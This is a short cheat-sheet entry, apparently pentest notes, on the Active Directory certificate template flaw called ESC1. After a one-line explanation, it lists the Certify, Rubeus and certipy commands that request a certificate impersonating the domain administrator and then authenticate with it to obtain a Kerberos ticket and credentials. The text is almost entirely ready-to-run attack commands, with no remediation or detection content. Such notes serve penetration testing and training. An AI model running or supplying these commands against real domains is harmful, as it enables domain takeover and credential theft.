ESC1
If a template allows a SAN
(or subjectAltName) different from the user making the CSR
(or certificate request), it would allow us to request a certificate as any user in the domain.
Windows
Certificate Request with alternative SAN
PS /home/bobbuilder> .\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:Template1 /altname:administrator@lab.local
Convert the certificate PEM
to pfx
Certificate Authentification
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap
Linux
Certificate Request with alternative SAN
bobbuilder[/home]$ certipy req -u user1@local.lab -p "pass1" -ca lab-LOCAL-DC-CA -template Template1 -upn administrator@local.lab -dc-ip 10.10.10.10
bobbuilder:bobbuilder[/home#home]$ certipy req -u user1@local.lab -p 'pass1' -ca lab-LOCAL-DC-CA -upn Administrator -template Template1 -dc-ip 10.10.10.10
Note: If we get an error: The NETBIOS connection with the remote host timed out
, just try again.
Certificate Authentification
bobbuilder:bobbuilder[/home#home]$ certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10